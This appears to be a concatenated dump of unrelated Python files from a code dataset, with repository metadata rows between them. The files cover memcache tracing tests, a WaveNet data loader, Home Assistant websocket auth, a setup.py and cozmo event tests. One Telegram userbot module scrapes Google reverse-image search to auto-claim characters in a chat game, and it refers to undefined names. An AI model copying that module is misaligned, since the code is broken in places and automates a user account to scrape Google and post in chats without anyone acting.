self, hostname, mock_socket_values, serializer=None, **kwargs
): # pylint: disable=no-self-use
mock_client = pymemcache.client.base.Client(
hostname, serializer=serializer, **kwargs
)
mock_client.sock = MockSocket(mock_socket_values)
client = pymemcache.client.base.PooledClient(
hostname, serializer=serializer
)
client.client_pool = pymemcache.pool.ObjectPool(lambda: mock_client)
return mock_client
def make_client(self, *mock_socket_values, **kwargs):
current_port = TEST_PORT
# pylint: disable=import-outside-toplevel
from pymemcache.client.hash import HashClient
# pylint: disable=attribute-defined-outside-init
self.client = HashClient([], **kwargs)
ip = TEST_HOST
for vals in mock_socket_values:
url_string = "{}:{}".format(ip, current_port)
clnt_pool = self.make_client_pool(
(ip, current_port), vals, **kwargs
)
self.client.clients[url_string] = clnt_pool
self.client.hasher.add_node(url_string)
current_port += 1
return self.client
def check_spans(self, spans, num_expected, queries_expected):
"""A helper for validating basic span information."""
self.assertEqual(num_expected, len(spans))
for span, query in zip(spans, queries_expected):
self.assertEqual(span.name, "memcached.command")
self.assertIs(span.kind, trace_api.SpanKind.INTERNAL)
self.assertEqual(
span.attributes["net.peer.name"], "{}".format(TEST_HOST)
)
self.assertEqual(span.attributes["net.peer.port"], TEST_PORT)
self.assertEqual(span.attributes["db.type"], "memcached")
self.assertEqual(
span.attributes["db.url"],
"memcached://{}:{}".format(TEST_HOST, TEST_PORT),
)
self.assertEqual(span.attributes["db.statement"], query)
def test_delete_many_found(self):
client = self.make_client([b"STORED\r", b"\n", b"DELETED\r\n"])
result = client.add(b"key", b"value", noreply=False)
result = client.delete_many([b"key"], noreply=False)
self.assertTrue(result)
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 2, ["add key", "delete key"])
| 32.394286
| 81
| 0.632151
|
794dab153991a79fcc034623a437748f75fc1d04
| 4,621
|
py
|
Python
|
wavenet/data.py
|
wusq121/wavenet
|
98e9328292f5d5a72355027f88867e12d121d43f
|
[
"MIT"
] | 2
|
2019-09-10T08:51:30.000Z
|
2021-06-02T05:57:56.000Z
|
wavenet/data.py
|
wusq121/wavenet
|
98e9328292f5d5a72355027f88867e12d121d43f
|
[
"MIT"
] | null | null | null |
wavenet/data.py
|
wusq121/wavenet
|
98e9328292f5d5a72355027f88867e12d121d43f
|
[
"MIT"
] | null | null | null |
"""
data load and preprocess
"""
import os
import librosa
import numpy as np
import torch
import torch.utils.data as data
def load_audio(filename, sample_rate=22500, trim=True, trim_frame_length=2048):
audio, _ = librosa.load(filename, sr=sample_rate, mono=True)
audio = audio.reshape(-1, 1)
if trim:
        audio, _ = librosa.effects.trim(audio, frame_length=trim_frame_length)
return audio
def one_hot_encode(data, channels=256):
"""
    Return a one-hot numpy array shaped [C(channels), L(timesteps)].
"""
one_hot = np.zeros((channels, data.size), dtype=float)
one_hot[data.ravel(), np.arange(data.size)] = 1
return one_hot
def one_hot_decode(data, axis=0):
decoded = np.argmax(data, axis=axis)
return decoded
def quantize_encode(audio, quantization=256):
mu = float(quantization - 1)
quantization_space = np.linspace(-1, 1, quantization)
    quantized = np.sign(audio) * np.log(1 + mu * np.abs(audio)) / np.log(mu + 1)
quantized = np.digitize(quantized, quantization_space) - 1
return quantized
def quantize_decode(quantized, quantization=256):
mu = float(quantization - 1)
expand = (quantized / quantization) * 2.0 - 1
    waveform = np.sign(expand) * (np.exp(np.abs(expand) * np.log(1 + mu)) - 1) / mu
return waveform
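# Round-trip sketch (not part of the original module): mu-law companding is
# coarse near |x| ~ 1, so decode(encode(x)) only roughly reproduces the input.
def _demo_mu_law_roundtrip():
    audio = np.linspace(-0.9, 0.9, 5)
    restored = quantize_decode(quantize_encode(audio))
    assert np.max(np.abs(audio - restored)) < 0.1  # coarse but monotone
    return restored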
class Audioset(data.Dataset):
"""
    Items retrieved from this dataset are audio arrays shaped [C(channels), L(timesteps)].
"""
def __init__(self, data_dir, sample_rate=22500, in_channels=256,
trim=True):
super(Audioset, self).__init__()
self.in_channels = in_channels
self.sample_rate = sample_rate
self.trim = trim
self.root_path = data_dir
self.filename = [x for x in sorted(os.listdir(data_dir))]
def __getitem__(self, index):
filepath = os.path.join(self.root_path, self.filename[index])
raw_audio = load_audio(filepath, self.sample_rate, self.trim)
encode = one_hot_encode(quantize_encode(raw_audio, self.in_channels),
self.in_channels)
return encode
def __len__(self):
return len(self.filename)
class DataLoader(data.DataLoader):
def __init__(self,
data_dir,
receptive_fields,
sample_size=0,
sample_rate=22500,
in_channels=256,
batch_size=1,
shuffle=True):
"""
DataLoader for Network
:param data_dir: directory of data
:param receptive_fields: size of receptive fields.
:param sample_size: number of timesteps to train at once. sample size has to be bigger than receptive fields.
:param sample_rate: sound sampling rate
:param in_channels: number of input channels
:param batch_size:
:param shuffle:
"""
        dataset = Audioset(data_dir, sample_rate, in_channels)
super(DataLoader, self).__init__(dataset, batch_size, shuffle)
        if sample_size <= receptive_fields:
raise Exception(
"sample_size has to be bigger than receptive_fields")
self.sample_size = sample_size
self.receptive_fields = receptive_fields
self.collate_fn = self._collate_fn
def calc_sample_size(self, audio):
return self.sample_size if len(audio[0]) >= self.sample_size else len(
audio[0])
@staticmethod
def _variable(data):
tensor = torch.from_numpy(data).float()
if torch.cuda.is_available():
return torch.autograd.Variable(tensor.cuda())
else:
return torch.autograd.Variable(tensor)
def _collate_fn(self, audio):
audio = np.pad(audio, [[0, 0], [self.receptive_fields, 0], [0, 0]], 'constant')
if self.sample_size:
sample_size = self.calc_sample_size(audio)
while sample_size > self.receptive_fields:
inputs = audio[:, :sample_size, :]
                targets = audio[:, self.receptive_fields:sample_size, :]
yield self._variable(inputs), self._variable(one_hot_decode(targets, 2))
audio = audio[:, sample_size - self.receptive_fields:, :]
sample_size = self.calc_sample_size(audio)
else:
            targets = audio[:, self.receptive_fields:, :]
return self._variable(audio), self._variable(one_hot_decode(targets, 2))
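# Usage sketch (assumes a directory of audio files; not part of the module):
# each batch collated above is a generator of (inputs, targets) chunks whose
# inputs carry `receptive_fields` extra timesteps of left context.
def _demo_loader(data_dir):
    loader = DataLoader(data_dir, receptive_fields=1024, sample_size=20000)
    for batch in loader:
        for inputs, targets in batch:  # _collate_fn yields chunk by chunk
            return inputs.shape, targets.shape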
| 31.435374
| 117
| 0.608959
|
794dadd70198c482fd1abeae3d70e21cfde31e6b
| 11,375
|
py
|
Python
|
ub/modules/ShivamCredits.py
|
parv779/javes-3.0
|
d510717b2756a65b39ff18d9f53d4adc46d8e23f
|
[
"MIT"
] | 15
|
2020-12-13T17:37:05.000Z
|
2021-06-23T00:00:49.000Z
|
ub/modules/ShivamCredits.py
|
parv779/javes-3.0
|
d510717b2756a65b39ff18d9f53d4adc46d8e23f
|
[
"MIT"
] | 2
|
2021-01-11T16:39:31.000Z
|
2021-01-25T22:35:28.000Z
|
ub/modules/ShivamCredits.py
|
parv779/javes-3.0
|
d510717b2756a65b39ff18d9f53d4adc46d8e23f
|
[
"MIT"
] | 78
|
2020-12-13T17:52:51.000Z
|
2022-03-24T03:43:09.000Z
|
from ub.events import javes05
from ub import CMD_HELP, bot as javes, LOGS, JAVES_NAME
from ub.javes_main.commands import rekcah05
from telethon.events import ChatAction
# Made by Shivam (Sh1vam)
from ub import TEMP_DOWNLOAD_DIRECTORY
import os, re, bs4, requests, io
from telethon import events
from pathlib import Path
from os import remove
from bs4 import BeautifulSoup
from re import findall
from urllib.parse import quote_plus
from requests import get
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from PIL import Image
from telethon.tl.types import MessageMediaPhoto
import urllib
from ub import bot as borg
useragent = 'Mozilla/5.0 (Linux; Android 9; SM-G960F Build/PPR1.180610.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.70 Mobile Safari/537.36'
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', useragent)]
JAVES_NNAME = str(JAVES_NAME) if JAVES_NAME else str(JAVES_MSG)
WAFU_CHATID=int(os.environ.get("WAFU_CHATID",-1001230114424))
async def ParseSauce(googleurl):
source = opener.open(googleurl).read()
soup = BeautifulSoup(source, 'html.parser')
results = {'similar_images': '', 'best_guess': ''}
try:
for similar_image in soup.findAll('input', {'class': 'gLFyf'}):
url = 'https://www.google.com/search?tbm=isch&q=' + \
urllib.parse.quote_plus(similar_image.get('value'))
results['similar_images'] = url
except BaseException:
pass
for best_guess in soup.findAll('div', attrs={'class': 'r5a77d'}):
results['best_guess'] = best_guess.get_text()
return results
async def scam(results, lim):
single = opener.open(results['similar_images']).read()
decoded = single.decode('utf-8')
imglinks = []
counter = 0
pattern = r'^,\[\"(.*[!png|!jpg|!jpeg])\",[0-9]+,[0-9]+\]$'
oboi = re.findall(pattern, decoded, re.I | re.M)
for imglink in oboi:
counter += 1
if not counter >= int(lim):
imglinks.append(imglink)
else:
break
return imglinks
async def chrome(chrome_options=None):
if chrome_options is None:
chrome_options = await options()
if not os.path.isdir(TEMP_DOWNLOAD_DIRECTORY):
os.mkdir(TEMP_DOWNLOAD_DIRECTORY)
prefs = {'download.default_directory': TEMP_DOWNLOAD_DIRECTORY}
chrome_options.add_experimental_option('prefs', prefs)
driver = webdriver.Chrome(executable_path=CHROME_DRIVER,
options=chrome_options)
return driver
@javes.on(events.NewMessage(incoming=True))
async def on_new_message(event):
name = event.raw_text
snip = """appeared!
Add them to your harem by sending /protecc character name"""
pattern = r"( |^|[^\w])" + re.escape(snip) + r"( |$|[^\w])"
if re.search(pattern, name, flags=re.IGNORECASE):
try:
photo = io.BytesIO()
await event.client.download_media(event.media, photo)
image = Image.open(photo)
name = "okgoogle.png"
image.save(name, "PNG")
image.close()
searchUrl = 'https://www.google.com/searchbyimage/upload'
multipart = {
'encoded_image': (name, open(name, 'rb')),
'image_content': ''
}
response = requests.post(searchUrl,
files=multipart,
allow_redirects=False)
fetchUrl = response.headers['Location']
match = await ParseSauce(fetchUrl +"&preferences?hl=en&fg=1#languages")
guess = match['best_guess']
guesss = guess[12:]
try:
from ub.modules.sql_helper.autowafu_sql import get_current_wafu_settings
from ub.modules.sql_helper.autowafu_sql import update_previous_wafu
except AttributeError:
return
cws = get_current_wafu_settings(event.chat_id)
if cws:
await event.reply( f"/protecc {guesss}")
else:
await borg.send_message( WAFU_CHATID,f"/protecc {guesss}")
except Exception as e:
pass
'''@javes.on(ChatAction)
async def wafu_to_chat(event):
try:
from ub.modules.sql_helper.autowafu_sql import get_current_wafu_settings
from ub.modules.sql_helper.autowafu_sql import update_previous_wafu
except AttributeError:
return
cws = get_current_wafu_settings(event.chat_id)
if cws:'''
@javes05(outgoing=True, pattern=r"^!savewafu(?: |$)(.*)")
async def save_wafu(event):
try:
from ub.modules.sql_helper.autowafu_sql import add_wafu_setting
except AttributeError:
return await event.edit("`Running on Non-SQL mode!`")
string = """appeared!
Add them to your harem by sending /protecc character name"""
msg_id = None
if add_wafu_setting(event.chat_id, 0,string, msg_id) is True:
await event.edit('Auto wafu mode on')
else:
await event.edit(f"`{JAVES_NNAME}`: **auto wafu already present**")
@javes05(outgoing=True, pattern="^!checkwafu$")
async def show_wafu(event):
try:
from ub.modules.sql_helper.autowafu_sql import get_current_wafu_settings
except AttributeError:
await event.edit("`Running on Non-SQL mode!`")
return
cws = get_current_wafu_settings(event.chat_id)
if not cws:
await event.edit(f"`{JAVES_NNAME}`: **auto wafu not on.**")
return
else:
await event.edit(f"`{JAVES_NNAME}`: **auto wafu on.**")
@javes05(outgoing=True, pattern="^!clearwafu$")
async def del_wafu(event):
try:
from ub.modules.sql_helper.autowafu_sql import rm_wafu_setting
except AttributeError:
await event.edit("`Running on Non-SQL mode!`")
return
if rm_wafu_setting(event.chat_id) is True:
await event.edit(f"`{JAVES_NNAME}`: **auto wafu stops**")
else:
await event.edit(f"`{JAVES_NNAME}`: ** no auto wafu on. **")
| 48.404255
| 360
| 0.679121
|
794dae771531eaa01af409cebec126950c94cec8
| 3,623
|
py
|
Python
|
homeassistant/components/websocket_api/auth.py
|
MrDelik/core
|
93a66cc357b226389967668441000498a10453bb
|
[
"Apache-2.0"
] | 22,481
|
2020-03-02T13:09:59.000Z
|
2022-03-31T23:34:28.000Z
|
homeassistant/components/websocket_api/auth.py
|
MrDelik/core
|
93a66cc357b226389967668441000498a10453bb
|
[
"Apache-2.0"
] | 31,101
|
2020-03-02T13:00:16.000Z
|
2022-03-31T23:57:36.000Z
|
homeassistant/components/websocket_api/auth.py
|
MrDelik/core
|
93a66cc357b226389967668441000498a10453bb
|
[
"Apache-2.0"
] | 11,411
|
2020-03-02T14:19:20.000Z
|
2022-03-31T22:46:07.000Z
|
"""Handle the auth of a connection."""
from __future__ import annotations
from collections.abc import Callable
from typing import TYPE_CHECKING, Any, Final
from aiohttp.web import Request
import voluptuous as vol
from voluptuous.humanize import humanize_error
from homeassistant.auth.models import RefreshToken, User
from homeassistant.components.http.ban import process_success_login, process_wrong_login
from homeassistant.const import __version__
from homeassistant.core import CALLBACK_TYPE, HomeAssistant
from .connection import ActiveConnection
from .error import Disconnect
if TYPE_CHECKING:
from .http import WebSocketAdapter
TYPE_AUTH: Final = "auth"
TYPE_AUTH_INVALID: Final = "auth_invalid"
TYPE_AUTH_OK: Final = "auth_ok"
TYPE_AUTH_REQUIRED: Final = "auth_required"
AUTH_MESSAGE_SCHEMA: Final = vol.Schema(
{
vol.Required("type"): TYPE_AUTH,
vol.Exclusive("api_password", "auth"): str,
vol.Exclusive("access_token", "auth"): str,
}
)
def auth_ok_message() -> dict[str, str]:
"""Return an auth_ok message."""
return {"type": TYPE_AUTH_OK, "ha_version": __version__}
def auth_required_message() -> dict[str, str]:
"""Return an auth_required message."""
return {"type": TYPE_AUTH_REQUIRED, "ha_version": __version__}
def auth_invalid_message(message: str) -> dict[str, str]:
"""Return an auth_invalid message."""
return {"type": TYPE_AUTH_INVALID, "message": message}
class AuthPhase:
"""Connection that requires client to authenticate first."""
def __init__(
self,
logger: WebSocketAdapter,
hass: HomeAssistant,
send_message: Callable[[str | dict[str, Any]], None],
cancel_ws: CALLBACK_TYPE,
request: Request,
) -> None:
"""Initialize the authentiated connection."""
self._hass = hass
self._send_message = send_message
self._cancel_ws = cancel_ws
self._logger = logger
self._request = request
async def async_handle(self, msg: dict[str, str]) -> ActiveConnection:
"""Handle authentication."""
try:
msg = AUTH_MESSAGE_SCHEMA(msg)
except vol.Invalid as err:
error_msg = (
f"Auth message incorrectly formatted: {humanize_error(msg, err)}"
)
self._logger.warning(error_msg)
self._send_message(auth_invalid_message(error_msg))
raise Disconnect from err
if "access_token" in msg:
self._logger.debug("Received access_token")
refresh_token = await self._hass.auth.async_validate_access_token(
msg["access_token"]
)
if refresh_token is not None:
conn = await self._async_finish_auth(refresh_token.user, refresh_token)
conn.subscriptions[
"auth"
] = self._hass.auth.async_register_revoke_token_callback(
refresh_token.id, self._cancel_ws
)
return conn
self._send_message(auth_invalid_message("Invalid access token or password"))
await process_wrong_login(self._request)
raise Disconnect
async def _async_finish_auth(
self, user: User, refresh_token: RefreshToken
) -> ActiveConnection:
"""Create an active connection."""
self._logger.debug("Auth OK")
await process_success_login(self._request)
self._send_message(auth_ok_message())
return ActiveConnection(
self._logger, self._hass, self._send_message, user, refresh_token
)
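# Illustrative handshake (derived from the constants above; messages only):
#   server -> client: {"type": "auth_required", "ha_version": "..."}
#   client -> server: {"type": "auth", "access_token": "<long-lived token>"}
#   server -> client: {"type": "auth_ok", "ha_version": "..."}       on success
#   server -> client: {"type": "auth_invalid", "message": "..."}     then Disconnect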
| 32.63964
| 88
| 0.663539
|
794db01e747f6fd6852026d3623061c0f8c6d699
| 1,498
|
py
|
Python
|
setup.py
|
mickstevens/plushcap
|
0602a69b950b49f17451684e2ebd355652beeb7e
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
mickstevens/plushcap
|
0602a69b950b49f17451684e2ebd355652beeb7e
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
mickstevens/plushcap
|
0602a69b950b49f17451684e2ebd355652beeb7e
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
readme = open('README.rst').read()
history = open('HISTORY.rst').read().replace('.. :changelog:', '')
requirements = [
# TODO: put package requirements here
]
test_requirements = [
# TODO: put package test requirements here
]
setup(
name='pisco-sour',
version='0.1.0',
description='Plushcap monitors websites and alerts people via text or phone call if there is a problem.',
long_description=readme + '\n\n' + history,
author='Mick Stevens',
author_email='mickstevens@yahoo.com',
url='https://github.com/mickstevens/plushcap',
packages=[
'plushcap',
],
package_dir={'plushcap':
'plushcap'},
include_package_data=True,
install_requires=requirements,
license="BSD",
zip_safe=False,
keywords='plushcap',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
"Programming Language :: Python :: 2",
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
test_suite='tests',
tests_require=test_requirements
)
| 27.236364
| 109
| 0.624166
|
794db02f372050109bf10f602052ebdefa376743
| 26,347
|
py
|
Python
|
tests/test_event.py
|
rootless4real/cozmo-python-sdk
|
dd29edef18748fcd816550469195323842a7872e
|
[
"Apache-2.0"
] | 794
|
2016-10-14T16:56:34.000Z
|
2022-03-31T16:21:21.000Z
|
tests/test_event.py
|
rootless4real/cozmo-python-sdk
|
dd29edef18748fcd816550469195323842a7872e
|
[
"Apache-2.0"
] | 63
|
2016-10-16T21:16:32.000Z
|
2021-12-25T06:01:36.000Z
|
tests/test_event.py
|
rootless4real/cozmo-python-sdk
|
dd29edef18748fcd816550469195323842a7872e
|
[
"Apache-2.0"
] | 485
|
2016-10-14T19:49:43.000Z
|
2022-03-29T17:30:09.000Z
|
# Copyright (c) 2016 Anki, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the file LICENSE.txt or at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import asyncio
from asyncio import test_utils
from cozmo import event
from cozmo import exceptions
class DispatchTest(event.Dispatcher):
pass
class EventReceiver(event.Dispatcher):
_result_evt_one = None
_result_evt_one_internal = None
_result_evt_two = None
_result_evt_internal = None
_result_evt_child1 = None
def recv_evt_one(self, evt, **kw):
self._result_evt_one = evt
def _recv_evt_one(self, evt, **kw):
self._result_evt_one_internal = evt
async def recv_evt_two(self, evt, param1=False, **kw):
self._result_evt_two = evt
if param1:
raise exceptions.StopPropogation
def _recv_evt_child1(self, evt, **kw):
self._result_evt_child1 = evt
def recv_default_handler(self, evt, **kw):
self._result_default_handler = evt
def _recv_default_handler(self, evt, **kw):
self._result_default_handler_internal = evt
def _recv_evt_internal(self, evt, **kw):
self._result_evt_internal = evt
def named_handler(self, evt, param1=False, **kw):
self._result_named_handler = evt
if param1:
raise exceptions.StopPropogation
class EventTests(test_utils.TestCase):
def setUp(self):
self.loop = self.new_test_loop()
self.addCleanup(self.loop.close)
event.registered_events = {}
self._register_events()
def _register_events(self):
class EvtOne(event.Event):
"Test event"
param1 = "Parameter one"
param2 = "Parameter two"
param3 = "Parameter three"
class EvtTwo(event.Event):
"Test event"
param1 = "Parameter one"
param2 = "Parameter two"
class _EvtInternal(event.Event):
"Internal event"
param1 = "Parameter one"
param2 = "Parameter two"
class _EvtChild1(EvtOne):
'Child event'
param4 = "Parameter four"
class _EvtChild2(_EvtChild1):
'Subchild event'
param5 = "Parameter five"
self.evt_one = EvtOne
self.evt_two = EvtTwo
self.evt_internal = _EvtInternal
self.evt_child1 = _EvtChild1
self.evt_child2 = _EvtChild2
def test_dupe_event_def(self):
# Duplicate event names should fail
class EvtTest1(event.Event):
"test1"
class EvtTest2(event.Event):
"test2"
with self.assertRaises(ValueError):
class EvtTest1(event.Event):
"test3"
def test_event_set_attr(self):
ev = self.evt_one(param1=123, param3=345)
self.assertEqual(ev.param1, 123)
self.assertEqual(ev.param2, None)
self.assertEqual(ev.param3, 345)
def test_event_dispatch_func(self):
ev = self.evt_one(param1=123, param3=345)
cap_kw = {}
cap_evt = None
def capture(evt, **kw):
nonlocal cap_kw, cap_evt
cap_kw = kw
cap_evt = evt
return "set"
result = ev._dispatch_to_func(capture)
self.assertEqual(result, "set")
self.assertEqual(cap_evt, ev)
self.assertEqual(cap_kw, {"param1": 123, "param2": None, "param3": 345})
def test_event_dispatch_obj(self):
ev = self.evt_one(param1=123, param3=345)
cap_kw = {}
cap_evt = None
class capture:
def recv_evt_one(self, evt, **kw):
nonlocal cap_kw, cap_evt
cap_kw = kw
cap_evt = evt
return "set"
result = ev._dispatch_to_obj(capture())
self.assertEqual(result, "set")
self.assertEqual(cap_evt, ev)
self.assertEqual(cap_kw, {"param1": 123, "param2": None, "param3": 345})
def test_event_dispatch_obj_default(self):
ev = self.evt_one(param1=123, param3=345)
cap_kw = {}
cap_evt = None
class capture:
def recv_default_handler(self, evt, **kw):
nonlocal cap_kw, cap_evt
cap_kw = kw
cap_evt = evt
return "set"
result = ev._dispatch_to_obj(capture())
self.assertEqual(result, "set")
self.assertEqual(cap_evt, ev)
self.assertEqual(cap_kw, {"param1": 123, "param2": None, "param3": 345})
def test_event_dispatch_obj_default_internal(self):
ev = self.evt_internal(param1=123)
cap_kw = {}
cap_evt = None
class capture:
def _recv_default_handler(self, evt, **kw):
nonlocal cap_kw, cap_evt
cap_kw = kw
cap_evt = evt
return "set"
result = ev._dispatch_to_obj(capture())
self.assertEqual(result, "set")
self.assertEqual(cap_evt, ev)
self.assertEqual(cap_kw, {"param1": 123, "param2": None})
def test_event_dispatch_future(self):
ev = self.evt_one(param1=123, param3=345)
f = asyncio.Future(loop=self.loop)
ev._dispatch_to_future(f)
self.assertEqual(f.result(), ev)
def test_add_remove_handler_byfunc(self):
ins = DispatchTest(loop=self.loop)
ins.add_event_handler(self.evt_one, "one")
ins.add_event_handler(self.evt_one, "two")
ins.add_event_handler(self.evt_two, "three")
self.assertEqual(ins._dispatch_handlers["EvtOne"],
[event.Handler(ins, self.evt_one, 'one'), event.Handler(ins, self.evt_one, 'two')])
self.assertEqual(ins._dispatch_handlers["EvtTwo"],
[event.Handler(ins, self.evt_two, 'three')])
ins.remove_event_handler(self.evt_one, 'two')
self.assertEqual(ins._dispatch_handlers["EvtOne"],
[event.Handler(ins, self.evt_one, 'one')])
with self.assertRaises(ValueError):
ins.remove_event_handler(self.evt_one, 'two')
def test_dispatch_event_obj_sync(self):
recv = EventReceiver(loop=self.loop)
recv.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
self.assertEqual(recv._result_evt_one.param2, 123)
def test_dispatch_event_obj_async(self):
recv = EventReceiver(loop=self.loop)
recv.dispatch_event(self.evt_two, param1=False, param2=123)
test_utils.run_briefly(self.loop)
self.assertEqual(recv._result_evt_two.param2, 123)
def test_dispatch_event_obj_internal(self):
recv = EventReceiver(loop=self.loop)
recv.dispatch_event(self.evt_internal, param1=False, param2=123)
test_utils.run_briefly(self.loop)
self.assertEqual(recv._result_evt_internal.param2, 123)
def test_dispatch_event_handler(self):
# should fire both the object's handler, and the registered handler
recv = EventReceiver(loop=self.loop)
cap_evt = None
def capture(evt, **kw):
nonlocal cap_evt
cap_evt = evt
recv.add_event_handler(self.evt_one, capture)
recv.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
self.assertEqual(recv._result_evt_one.param2, 123)
self.assertEqual(cap_evt.param2, 123)
def test_dispatch_event_async_handler(self):
# should fire both the object's handler, and the registered handler
recv = EventReceiver(loop=self.loop)
cap_evt = None
async def capture(evt, **kw):
nonlocal cap_evt
cap_evt = evt
recv.add_event_handler(self.evt_one, capture)
recv.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
self.assertEqual(recv._result_evt_one.param2, 123)
self.assertEqual(cap_evt.param2, 123)
def test_dispatch_event_future(self):
# should fire both the future, and the registered handler
recv = EventReceiver(loop=self.loop)
f = asyncio.Future(loop=self.loop)
recv.add_event_handler(self.evt_one, f)
self.assertEqual(len(recv._dispatch_handlers['EvtOne']), 1)
recv.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
evt = f.result()
self.assertEqual(recv._result_evt_one.param2, 123)
self.assertEqual(evt.param2, 123)
        # the future should have been removed from the handler list
self.assertEqual(len(recv._dispatch_handlers['EvtOne']), 0)
def test_dispatch_to_parent(self):
recv_parent = EventReceiver(loop=self.loop)
recv_child = EventReceiver(loop=self.loop, dispatch_parent=recv_parent)
recv_child.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
self.assertEqual(recv_child._result_evt_one.param2, 123)
self.assertEqual(recv_parent._result_evt_one.param2, 123)
def test_dispatch_stop_propogation(self):
recv = EventReceiver(loop=self.loop)
cap_evt = None
def handler(evt, **kw):
nonlocal cap_evt
cap_evt = evt
raise exceptions.StopPropogation()
recv.add_event_handler(self.evt_one, handler)
recv.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
self.assertEqual(cap_evt.param2, 123)
self.assertIsNone(recv._result_evt_one)
def test_dispatch_wait_for_event(self):
recv = EventReceiver(loop=self.loop)
co = recv.wait_for(self.evt_one, timeout=None)
f = asyncio.ensure_future(co, loop=self.loop)
test_utils.run_briefly(self.loop)
recv.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
evt = f.result()
self.assertEqual(evt.param2, 123)
self.assertEqual(recv._result_evt_one.param2, 123)
def test_dispatch_wait_for_timeout(self):
def gen():
yield
            # advance the loop's fake clock by 20 seconds, past the 10s timeout
yield 20
loop = self.new_test_loop(gen=gen)
recv = EventReceiver(loop=loop)
co = recv.wait_for(self.evt_one, timeout=10)
with self.assertRaises(asyncio.TimeoutError):
loop.run_until_complete(co)
def test_dispatch_wait_for_filter(self):
recv = EventReceiver(loop=self.loop)
filter = event.Filter(self.evt_one, param2=456)
co = recv.wait_for(filter, timeout=None)
f = asyncio.ensure_future(co, loop=self.loop)
test_utils.run_briefly(self.loop)
recv.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
self.assertFalse(f.done())
recv.dispatch_event(self.evt_one, param1=False, param2=456)
test_utils.run_briefly(self.loop)
self.assertTrue(f.done())
self.assertEqual(f.result().param2, 456)
def test_dispatch_filter_decorator_single(self):
recv = EventReceiver(loop=self.loop)
cap_evt = None
@event.filter_handler(self.evt_one, param2=456)
def handler(evt, **kw):
nonlocal cap_evt
cap_evt = evt
recv.add_event_handler(self.evt_one, handler)
recv.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
self.assertIsNone(cap_evt)
recv.dispatch_event(self.evt_one, param1=False, param2=456)
test_utils.run_briefly(self.loop)
self.assertIsNotNone(cap_evt)
self.assertEqual(cap_evt.param2, 456)
def test_dispatch_filter_setattr(self):
recv = EventReceiver(loop=self.loop)
filter = event.Filter(self.evt_one)
filter.param2 = 456
with self.assertRaises(AttributeError):
filter.param_invalid = 123
co = recv.wait_for(filter, timeout=None)
f = asyncio.ensure_future(co, loop=self.loop)
test_utils.run_briefly(self.loop)
recv.dispatch_event(self.evt_one, param1=False, param2=123)
test_utils.run_briefly(self.loop)
self.assertFalse(f.done())
recv.dispatch_event(self.evt_one, param1=False, param2=456)
test_utils.run_briefly(self.loop)
self.assertTrue(f.done())
self.assertEqual(f.result().param2, 456)
def test_dispatch_filter_decorator_multiple(self):
recv = EventReceiver(loop=self.loop)
cap_evt = None
@event.filter_handler(self.evt_one, param2=456)
@event.filter_handler(self.evt_one, param2=789)
def handler(evt, **kw):
nonlocal cap_evt
cap_evt = evt
recv.add_event_handler(self.evt_one, handler)
for num in (123,456,234,789):
cap_evt = None
recv.dispatch_event(self.evt_one, param1=False, param2=num)
test_utils.run_briefly(self.loop)
if num in (123, 234):
self.assertIsNone(cap_evt, msg="num=%d evt=%s" % (num, cap_evt))
else:
self.assertIsNotNone(cap_evt, msg="num=%d" % (num,))
self.assertEqual(cap_evt.param2, num, msg="num=%d evt=%s" % (num, cap_evt))
def test_dispatch_filter_decorator_lambda(self):
recv = EventReceiver(loop=self.loop)
cap_evt = None
@event.filter_handler(self.evt_one, param2=lambda val: val > 400)
def handler(evt, **kw):
nonlocal cap_evt
cap_evt = evt
recv.add_event_handler(self.evt_one, handler)
for num in (123,456,234,789):
cap_evt = None
recv.dispatch_event(self.evt_one, param1=False, param2=num)
test_utils.run_briefly(self.loop)
if num in (123, 234):
self.assertIsNone(cap_evt, msg="num=%d evt=%s" % (num, cap_evt))
else:
self.assertIsNotNone(cap_evt, msg="num=%d" % (num,))
self.assertEqual(cap_evt.param2, num, msg="num=%d evt=%s" % (num, cap_evt))
def test_obj_receiver_filter(self):
cap_evt = None
class filtered_receiver(event.Dispatcher):
@event.filter_handler(self.evt_one, param2=456)
def recv_evt_one(self, evt, **kw):
nonlocal cap_evt
cap_evt = evt
recv = filtered_receiver(loop=self.loop)
recv.dispatch_event(self.evt_one, param1=False, param2=100)
test_utils.run_briefly(self.loop)
self.assertIsNone(cap_evt)
recv.dispatch_event(self.evt_one, param1=False, param2=456)
test_utils.run_briefly(self.loop)
self.assertIsNotNone(cap_evt)
self.assertEqual(cap_evt.param2, 456)
def test_dispatch_parents_to_handler(self):
# Test dispatching an event subclass to a handler listening to the parent
recv = EventReceiver(loop=self.loop)
cap_evts = []
